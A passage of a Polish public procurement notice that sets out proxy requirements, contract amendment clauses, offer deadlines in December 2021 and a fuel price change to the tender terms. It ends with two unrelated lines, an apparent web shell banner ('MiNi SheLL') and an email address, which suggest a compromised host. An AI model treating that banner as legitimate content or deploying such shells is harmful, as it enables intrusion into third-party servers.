są do ustanowienia pełnomocnika. Dokument pełnomocnictwa z treści którego<br/>będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych<br/>wykonawców należy załączyć do oferty. Pełnomocnictwo powinno być załączone do oferty<br/>ipowinno zawierać w szczególności wskazanie:- postępowania o zamówienie publiczne, którego<br/>dotyczy,- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia<br/>wymienionych z nazwy z określeniem adresu siedziby,- ustanowionego pełnomocnika oraz<br/>zakresu jego umocowania. Wymagana forma:Pełnomocnictwo powinno zostać złożone w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, podpisem osobistym<br/>lub kwalifikowanym podpisem elektronicznym. Dopuszcza się również<br/>przedłożenieelektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez<br/>notariusza, tj. podpisanej kwalifikowanym podpisem elektronicznym osoby posiadającej<br/>uprawnienia notariusza.b) zobowiązanie podmiotu trzeciego do oddania Wykonawcy do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia w przypadku gdy<br/>Wykonawca, w celu spełnienia warunków, o którym mowa w Rozdziale II pkt 7 ppkt 4 SWZ,<br/>będzie polegał na zdolnościach technicznych lub zawodowych innych podmiotów.Zobowiązanie<br/>podmiotuudostępniającego zasoby lub inny podmiotowy środek dowodowy potwierdza, że<br/>stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty<br/>dostęp do tych zasobów oraz określa w szczególności:- zakres dostępnych wykonawcy<br/>zasobów podmiotu udostępniającego zasoby;- sposób i okres udostępnienia wykonawcy i<br/>wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywani<br/>zamówienia;- czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego<br/>wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub<br/>usługi, których wskazane zdolności dotyczą.Wymagana forma:Zobowiązanie musi być złożone<br/>w formie elektronicznej lubw postaci elektronicznej opatrzonej podpisem zaufanym, podpisem<br/>osobistym lub kwalifikowany podpisem elektrycznym osoby upoważnionej do reprezentowania<br/>wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym<br/>dla formy organizacyjnej lub innym dokumencie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 2.	Zmiana postanowień niniejszej Umowy w stosunku do treści oferty Wykonawcy, na podstawie której został wybrany, możliwa jest wyłącznie w przypadku zaistnienia jednej z następujących okoliczności i w zakresie określonym poniżej: <br/><br/>a)	siła wyższa uniemożliwiająca wykonanie Przedmiotu Umowy zgodnie z SWZ, przez którą, na potrzeby niniejszej Umowy rozumie się zdarzenie zewnętrzne o charakterze niezależnym od Stron, którego Strony nie mogły przewidzieć, oraz którego Strony nie mogły uniknąć ani któremu nie mogły zapobiec przy zachowaniu należytej staranności, w szczególności: powódź, pożar i inne klęski żywiołowe, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia, wyjątkowo niesprzyjające warunki atmosferyczne, zamieszki, strajki lub inne formy protestu, akty nieposłuszeństwa obywatelskiego, demonstracje i rozruchy społeczne, ataki terrorystyczne, stan wojenny, stan wyjątkowy, działania wojenne, akty władz państwowych uniemożliwiające wykonanie zobowiązań umownych. <br/><br/>b) gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia niniejszej Umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze Stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania niniejszej Umowy zgodnie z SWZ; <br/><br/>c) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Przedmiotu Umowy lub świadczenia Stron; <br/><br/>d) powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w niniejszej Umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie niniejszej umowy w celu jednoznacznej interpretacji jej zapisów przez Strony; <br/><br/>e) zaistniały przyczyny niezależne od działania Stron, których przy zachowaniu wszelkich należytych środków nie można było uniknąć, ani im zapobiec. <br/><br/>3.	Strona występująca o zmianę postanowień niniejszej Umowy, zobowiązana jest do udokumentowania zaistnienia okoliczności stanowiących przesłankę do zmiany. Wniosek o zmianę postanowień niniejszej Umowy musi być złożony na piśmie. <br/><br/>4.	Wystąpienie okoliczności, o których mowa w ust. 2 powyżej, skutkuje powstaniem po stronie Zamawiającego uprawnienia do wprowadzenia zmian do niniejszej Umowy, nie zaś obowiązku. Okoliczności te nie mogą również stanowić podstawy roszczeń Wykonawcy o dodatkowe wynagrodzenie lub odszkodowanie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-24 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">http://dspwierzbica.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-24 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-22</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> wprowadza następujące zmiany do SWZ:<br/><br/><br/><br/>Zamawiający dokonała następujących zmian: <br/>W Załączniku nr 1 Formularz ofertowy zapis kolumnie (5) w brzemieniu: <br/><br/>„Cena hurtowa producenta netto (zł/litr)”<br/><br/>Zostaje zastąpiony zapisem: <br/><br/>„Cena hurtowa producenta netto (zł/litr) na dzień 16.12.2021 r.”<br/><br/>W SWZ w rozdziale II pkt 12 „Opis sposobu obliczenia ceny” dodaje się zapis w brzmieniu: <br/><br/>W formularzu ofertowym w kolumnie (5) należy podać cenę hurtową producenta netto (zł/litr) na dzień 16.12.2021 r

Creat By MiNi SheLL
Email: jattceo@gmail.com